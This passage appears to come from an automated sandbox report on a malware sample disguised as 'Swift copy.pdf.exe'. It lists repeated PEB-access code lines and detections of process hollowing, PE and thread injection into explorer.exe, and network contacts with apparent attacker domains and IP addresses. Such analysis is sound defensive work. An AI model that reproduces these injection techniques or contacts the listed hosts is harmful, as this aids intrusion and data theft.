          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0496002D mov eax, dword ptr fs:[00000030h]10_2_0496002D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0496002D mov eax, dword ptr fs:[00000030h]10_2_0496002D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0494B02A mov eax, dword ptr fs:[00000030h]10_2_0494B02A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0494B02A mov eax, dword ptr fs:[00000030h]10_2_0494B02A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0494B02A mov eax, dword ptr fs:[00000030h]10_2_0494B02A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0494B02A mov eax, dword ptr fs:[00000030h]10_2_0494B02A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04950050 mov eax, dword ptr fs:[00000030h]10_2_04950050
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04950050 mov eax, dword ptr fs:[00000030h]10_2_04950050
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049CC450 mov eax, dword ptr fs:[00000030h]10_2_049CC450
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049CC450 mov eax, dword ptr fs:[00000030h]10_2_049CC450
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A01074 mov eax, dword ptr fs:[00000030h]10_2_04A01074
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0496A44B mov eax, dword ptr fs:[00000030h]10_2_0496A44B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049F2073 mov eax, dword ptr fs:[00000030h]10_2_049F2073
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0495746D mov eax, dword ptr fs:[00000030h]10_2_0495746D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04962990 mov eax, dword ptr fs:[00000030h]10_2_04962990
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A005AC mov eax, dword ptr fs:[00000030h]10_2_04A005AC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A005AC mov eax, dword ptr fs:[00000030h]10_2_04A005AC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0496FD9B mov eax, dword ptr fs:[00000030h]10_2_0496FD9B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0496FD9B mov eax, dword ptr fs:[00000030h]10_2_0496FD9B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0496A185 mov eax, dword ptr fs:[00000030h]10_2_0496A185
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0495C182 mov eax, dword ptr fs:[00000030h]10_2_0495C182
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04962581 mov eax, dword ptr fs:[00000030h]10_2_04962581
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04962581 mov eax, dword ptr fs:[00000030h]10_2_04962581
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04962581 mov eax, dword ptr fs:[00000030h]10_2_04962581
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04962581 mov eax, dword ptr fs:[00000030h]10_2_04962581
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04932D8A mov eax, dword ptr fs:[00000030h]10_2_04932D8A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04932D8A mov eax, dword ptr fs:[00000030h]10_2_04932D8A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04932D8A mov eax, dword ptr fs:[00000030h]10_2_04932D8A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04932D8A mov eax, dword ptr fs:[00000030h]10_2_04932D8A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04932D8A mov eax, dword ptr fs:[00000030h]10_2_04932D8A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04961DB5 mov eax, dword ptr fs:[00000030h]10_2_04961DB5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04961DB5 mov eax, dword ptr fs:[00000030h]10_2_04961DB5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04961DB5 mov eax, dword ptr fs:[00000030h]10_2_04961DB5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B51BE mov eax, dword ptr fs:[00000030h]10_2_049B51BE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B51BE mov eax, dword ptr fs:[00000030h]10_2_049B51BE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B51BE mov eax, dword ptr fs:[00000030h]10_2_049B51BE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B51BE mov eax, dword ptr fs:[00000030h]10_2_049B51BE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049661A0 mov eax, dword ptr fs:[00000030h]10_2_049661A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049661A0 mov eax, dword ptr fs:[00000030h]10_2_049661A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049635A1 mov eax, dword ptr fs:[00000030h]10_2_049635A1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B69A6 mov eax, dword ptr fs:[00000030h]10_2_049B69A6
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B6DC9 mov eax, dword ptr fs:[00000030h]10_2_049B6DC9
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B6DC9 mov eax, dword ptr fs:[00000030h]10_2_049B6DC9
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B6DC9 mov eax, dword ptr fs:[00000030h]10_2_049B6DC9
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B6DC9 mov ecx, dword ptr fs:[00000030h]10_2_049B6DC9
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B6DC9 mov eax, dword ptr fs:[00000030h]10_2_049B6DC9
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B6DC9 mov eax, dword ptr fs:[00000030h]10_2_049B6DC9
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049E8DF1 mov eax, dword ptr fs:[00000030h]10_2_049E8DF1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0493B1E1 mov eax, dword ptr fs:[00000030h]10_2_0493B1E1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0493B1E1 mov eax, dword ptr fs:[00000030h]10_2_0493B1E1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0493B1E1 mov eax, dword ptr fs:[00000030h]10_2_0493B1E1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049C41E8 mov eax, dword ptr fs:[00000030h]10_2_049C41E8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0494D5E0 mov eax, dword ptr fs:[00000030h]10_2_0494D5E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0494D5E0 mov eax, dword ptr fs:[00000030h]10_2_0494D5E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04939100 mov eax, dword ptr fs:[00000030h]10_2_04939100
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04939100 mov eax, dword ptr fs:[00000030h]10_2_04939100
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04939100 mov eax, dword ptr fs:[00000030h]10_2_04939100
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A08D34 mov eax, dword ptr fs:[00000030h]10_2_04A08D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04943D34 mov eax, dword ptr fs:[00000030h]10_2_04943D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04943D34 mov eax, dword ptr fs:[00000030h]10_2_04943D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04943D34 mov eax, dword ptr fs:[00000030h]10_2_04943D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04943D34 mov eax, dword ptr fs:[00000030h]10_2_04943D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04943D34 mov eax, dword ptr fs:[00000030h]10_2_04943D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04943D34 mov eax, dword ptr fs:[00000030h]10_2_04943D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04943D34 mov eax, dword ptr fs:[00000030h]10_2_04943D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04943D34 mov eax, dword ptr fs:[00000030h]10_2_04943D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04943D34 mov eax, dword ptr fs:[00000030h]10_2_04943D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04943D34 mov eax, dword ptr fs:[00000030h]10_2_04943D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04943D34 mov eax, dword ptr fs:[00000030h]10_2_04943D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04943D34 mov eax, dword ptr fs:[00000030h]10_2_04943D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04943D34 mov eax, dword ptr fs:[00000030h]10_2_04943D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0493AD30 mov eax, dword ptr fs:[00000030h]10_2_0493AD30
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0496513A mov eax, dword ptr fs:[00000030h]10_2_0496513A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0496513A mov eax, dword ptr fs:[00000030h]10_2_0496513A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049BA537 mov eax, dword ptr fs:[00000030h]10_2_049BA537
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04964D3B mov eax, dword ptr fs:[00000030h]10_2_04964D3B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04964D3B mov eax, dword ptr fs:[00000030h]10_2_04964D3B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04964D3B mov eax, dword ptr fs:[00000030h]10_2_04964D3B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04954120 mov eax, dword ptr fs:[00000030h]10_2_04954120
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04954120 mov eax, dword ptr fs:[00000030h]10_2_04954120
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04954120 mov eax, dword ptr fs:[00000030h]10_2_04954120
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04954120 mov eax, dword ptr fs:[00000030h]10_2_04954120
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04954120 mov ecx, dword ptr fs:[00000030h]10_2_04954120
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04957D50 mov eax, dword ptr fs:[00000030h]10_2_04957D50
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0495B944 mov eax, dword ptr fs:[00000030h]10_2_0495B944
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0495B944 mov eax, dword ptr fs:[00000030h]10_2_0495B944
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04973D43 mov eax, dword ptr fs:[00000030h]10_2_04973D43
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B3540 mov eax, dword ptr fs:[00000030h]10_2_049B3540
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0493B171 mov eax, dword ptr fs:[00000030h]10_2_0493B171
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0493B171 mov eax, dword ptr fs:[00000030h]10_2_0493B171
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0495C577 mov eax, dword ptr fs:[00000030h]10_2_0495C577
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0495C577 mov eax, dword ptr fs:[00000030h]10_2_0495C577
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0493C962 mov eax, dword ptr fs:[00000030h]10_2_0493C962
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0496D294 mov eax, dword ptr fs:[00000030h]10_2_0496D294
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0496D294 mov eax, dword ptr fs:[00000030h]10_2_0496D294
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A00EA5 mov eax, dword ptr fs:[00000030h]10_2_04A00EA5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A00EA5 mov eax, dword ptr fs:[00000030h]10_2_04A00EA5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A00EA5 mov eax, dword ptr fs:[00000030h]10_2_04A00EA5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049CFE87 mov eax, dword ptr fs:[00000030h]10_2_049CFE87
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0494AAB0 mov eax, dword ptr fs:[00000030h]10_2_0494AAB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0494AAB0 mov eax, dword ptr fs:[00000030h]10_2_0494AAB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0496FAB0 mov eax, dword ptr fs:[00000030h]10_2_0496FAB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049352A5 mov eax, dword ptr fs:[00000030h]10_2_049352A5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049352A5 mov eax, dword ptr fs:[00000030h]10_2_049352A5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049352A5 mov eax, dword ptr fs:[00000030h]10_2_049352A5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049352A5 mov eax, dword ptr fs:[00000030h]10_2_049352A5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049352A5 mov eax, dword ptr fs:[00000030h]10_2_049352A5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B46A7 mov eax, dword ptr fs:[00000030h]10_2_049B46A7
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04978EC7 mov eax, dword ptr fs:[00000030h]10_2_04978EC7
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049636CC mov eax, dword ptr fs:[00000030h]10_2_049636CC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04962ACB mov eax, dword ptr fs:[00000030h]10_2_04962ACB
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049EFEC0 mov eax, dword ptr fs:[00000030h]10_2_049EFEC0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04962AE4 mov eax, dword ptr fs:[00000030h]10_2_04962AE4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049616E0 mov ecx, dword ptr fs:[00000030h]10_2_049616E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A08ED6 mov eax, dword ptr fs:[00000030h]10_2_04A08ED6
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049476E2 mov eax, dword ptr fs:[00000030h]10_2_049476E2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04935210 mov eax, dword ptr fs:[00000030h]10_2_04935210
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04935210 mov ecx, dword ptr fs:[00000030h]10_2_04935210
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04935210 mov eax, dword ptr fs:[00000030h]10_2_04935210
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04935210 mov eax, dword ptr fs:[00000030h]10_2_04935210
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0493AA16 mov eax, dword ptr fs:[00000030h]10_2_0493AA16
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0493AA16 mov eax, dword ptr fs:[00000030h]10_2_0493AA16
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04953A1C mov eax, dword ptr fs:[00000030h]10_2_04953A1C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0496A61C mov eax, dword ptr fs:[00000030h]10_2_0496A61C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0496A61C mov eax, dword ptr fs:[00000030h]10_2_0496A61C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0493C600 mov eax, dword ptr fs:[00000030h]10_2_0493C600
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0493C600 mov eax, dword ptr fs:[00000030h]10_2_0493C600
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0493C600 mov eax, dword ptr fs:[00000030h]10_2_0493C600
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04968E00 mov eax, dword ptr fs:[00000030h]10_2_04968E00
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049F1608 mov eax, dword ptr fs:[00000030h]10_2_049F1608
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04948A0A mov eax, dword ptr fs:[00000030h]10_2_04948A0A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049EFE3F mov eax, dword ptr fs:[00000030h]10_2_049EFE3F
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0493E620 mov eax, dword ptr fs:[00000030h]10_2_0493E620
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04974A2C mov eax, dword ptr fs:[00000030h]10_2_04974A2C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04974A2C mov eax, dword ptr fs:[00000030h]10_2_04974A2C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A08A62 mov eax, dword ptr fs:[00000030h]10_2_04A08A62
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049C4257 mov eax, dword ptr fs:[00000030h]10_2_049C4257
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04939240 mov eax, dword ptr fs:[00000030h]10_2_04939240
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04939240 mov eax, dword ptr fs:[00000030h]10_2_04939240
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04939240 mov eax, dword ptr fs:[00000030h]10_2_04939240
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04939240 mov eax, dword ptr fs:[00000030h]10_2_04939240
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04947E41 mov eax, dword ptr fs:[00000030h]10_2_04947E41
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04947E41 mov eax, dword ptr fs:[00000030h]10_2_04947E41
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04947E41 mov eax, dword ptr fs:[00000030h]10_2_04947E41
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04947E41 mov eax, dword ptr fs:[00000030h]10_2_04947E41
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04947E41 mov eax, dword ptr fs:[00000030h]10_2_04947E41
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04947E41 mov eax, dword ptr fs:[00000030h]10_2_04947E41
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0495AE73 mov eax, dword ptr fs:[00000030h]10_2_0495AE73
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0495AE73 mov eax, dword ptr fs:[00000030h]10_2_0495AE73
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0495AE73 mov eax, dword ptr fs:[00000030h]10_2_0495AE73
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0495AE73 mov eax, dword ptr fs:[00000030h]10_2_0495AE73
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0495AE73 mov eax, dword ptr fs:[00000030h]10_2_0495AE73
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0497927A mov eax, dword ptr fs:[00000030h]10_2_0497927A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0494766D mov eax, dword ptr fs:[00000030h]10_2_0494766D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049EB260 mov eax, dword ptr fs:[00000030h]10_2_049EB260
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049EB260 mov eax, dword ptr fs:[00000030h]10_2_049EB260
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04948794 mov eax, dword ptr fs:[00000030h]10_2_04948794
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04962397 mov eax, dword ptr fs:[00000030h]10_2_04962397
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A05BA5 mov eax, dword ptr fs:[00000030h]10_2_04A05BA5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0496B390 mov eax, dword ptr fs:[00000030h]10_2_0496B390
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B7794 mov eax, dword ptr fs:[00000030h]10_2_049B7794
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B7794 mov eax, dword ptr fs:[00000030h]10_2_049B7794
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B7794 mov eax, dword ptr fs:[00000030h]10_2_049B7794
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049F138A mov eax, dword ptr fs:[00000030h]10_2_049F138A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04941B8F mov eax, dword ptr fs:[00000030h]10_2_04941B8F
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04941B8F mov eax, dword ptr fs:[00000030h]10_2_04941B8F
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049ED380 mov ecx, dword ptr fs:[00000030h]10_2_049ED380
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04964BAD mov eax, dword ptr fs:[00000030h]10_2_04964BAD
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04964BAD mov eax, dword ptr fs:[00000030h]10_2_04964BAD
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04964BAD mov eax, dword ptr fs:[00000030h]10_2_04964BAD
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B53CA mov eax, dword ptr fs:[00000030h]10_2_049B53CA
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B53CA mov eax, dword ptr fs:[00000030h]10_2_049B53CA
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049737F5 mov eax, dword ptr fs:[00000030h]10_2_049737F5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049603E2 mov eax, dword ptr fs:[00000030h]10_2_049603E2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049603E2 mov eax, dword ptr fs:[00000030h]10_2_049603E2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049603E2 mov eax, dword ptr fs:[00000030h]10_2_049603E2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049603E2 mov eax, dword ptr fs:[00000030h]10_2_049603E2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049603E2 mov eax, dword ptr fs:[00000030h]10_2_049603E2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049603E2 mov eax, dword ptr fs:[00000030h]10_2_049603E2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0495DBE9 mov eax, dword ptr fs:[00000030h]10_2_0495DBE9
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0495F716 mov eax, dword ptr fs:[00000030h]10_2_0495F716
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049F131B mov eax, dword ptr fs:[00000030h]10_2_049F131B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049CFF10 mov eax, dword ptr fs:[00000030h]10_2_049CFF10
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049CFF10 mov eax, dword ptr fs:[00000030h]10_2_049CFF10
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0496A70E mov eax, dword ptr fs:[00000030h]10_2_0496A70E
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0496A70E mov eax, dword ptr fs:[00000030h]10_2_0496A70E
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0496E730 mov eax, dword ptr fs:[00000030h]10_2_0496E730
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A0070D mov eax, dword ptr fs:[00000030h]10_2_04A0070D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A0070D mov eax, dword ptr fs:[00000030h]10_2_04A0070D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04934F2E mov eax, dword ptr fs:[00000030h]10_2_04934F2E
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04934F2E mov eax, dword ptr fs:[00000030h]10_2_04934F2E
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A08F6A mov eax, dword ptr fs:[00000030h]10_2_04A08F6A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0493F358 mov eax, dword ptr fs:[00000030h]10_2_0493F358
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0493DB40 mov eax, dword ptr fs:[00000030h]10_2_0493DB40
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0494EF40 mov eax, dword ptr fs:[00000030h]10_2_0494EF40
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04963B7A mov eax, dword ptr fs:[00000030h]10_2_04963B7A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04963B7A mov eax, dword ptr fs:[00000030h]10_2_04963B7A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0493DB60 mov ecx, dword ptr fs:[00000030h]10_2_0493DB60
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0494FF60 mov eax, dword ptr fs:[00000030h]10_2_0494FF60
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A08B58 mov eax, dword ptr fs:[00000030h]10_2_04A08B58
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.agenciaorange.net
          Source: C:\Windows\explorer.exeDomain query: www.lehoachi.com
          Source: C:\Windows\explorer.exeNetwork Connect: 204.11.56.48 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 74.208.236.87 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.technomark.xyz
          Source: C:\Windows\explorer.exeDomain query: www.wapgoals.com
          Source: C:\Windows\explorer.exeNetwork Connect: 174.136.25.55 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 45.33.51.100 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.rileysboutique.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 51.222.80.112 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.stepmed.life
          Source: C:\Windows\explorer.exeDomain query: www.indiafoodtraveling.com
          Source: C:\Windows\explorer.exeNetwork Connect: 5.101.123.53 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.criticalredux.com
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeMemory written: C:\Users\user\Desktop\Swift copy.pdf.exe base: 400000 value starts with: 4D5AJump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeThread register set: target process: 3440Jump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeThread register set: target process: 3440Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeSection unmapped: C:\Windows\SysWOW64\cscript.exe base address: 30000Jump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess created: C:\Users\user\Desktop\Swift copy.pdf.exe C:\Users\user\Desktop\Swift copy.pdf.exeJump to behavior
